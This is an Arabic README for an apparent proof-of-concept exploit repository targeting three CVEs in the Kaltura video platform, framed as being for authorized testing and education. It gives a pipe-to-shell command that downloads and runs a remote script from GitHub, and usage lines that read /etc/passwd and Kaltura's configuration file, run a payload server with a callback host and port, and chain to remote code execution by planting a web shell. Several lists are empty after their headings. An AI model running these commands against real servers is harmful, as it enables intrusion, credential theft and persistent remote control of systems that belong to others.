
إثباتات مفهوم لاستغلالات CVE-2026-19912 وCVE-2026-19913 وCVE-2026-19914، توضح قراءة الملفات وتنفيذ الأكواد عن بُعد في Kaltura، مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية.
شغّل أحدث إصدار من سكربت التنزيل الخارجي مباشرة من GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
يتطلب هذا الأمر Bash و
curl. راجع السكربت البعيد قبل تشغيله إذا كنت لا تثق بالمصدر.
استخدم هذا المشروع فقط في بيئات آمنة ومصرح بها مثل:
مثال على الإعداد:
git clone <repository-url>
cd <repository-name>
# المشروع يستخدم Python، اتبع ما يلي
# إنشاء بيئة افتراضية
python -m venv venv
# تفعيل البيئة الافتراضية
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# تثبيت المتطلبات
pip install -r requirements.txt
مثال على الاستخدام:
# 1. قراءة الملف (الأكثر موثوقية، يعمل كما هو موضح في المقال)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. خادم الحمولة فقط (استخدمه مع Burp / curl يدويًا)
python3 kaltura_poc.py serve --lport 8888
# 3. هيكل السلسلة الكاملة
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للتحكم.
هذا المستودع مخصص للبحث الأمني التعليمي والمصرح به فقط.
صُمم لمساعدة المستخدمين على التعرف على:
استخدم هذا المستودع فقط في بيئات لديك إذن باستخدامها، مثل:
الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.
المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو قضايا قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدامك لهذا المستودع، فإنك توافق على أن:
هذا المشروع مخصص لـ:
يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للإفصاح المسؤول أو التعاون، تواصل مع مُشرف المستودع عبر GitHub.
استكشف مجموعة PoC CVE للحصول على موارد إضافية لإثبات المفهوم (PoC) للثغرات، مخصصة للبحث الأمني المصرح به والتعليم.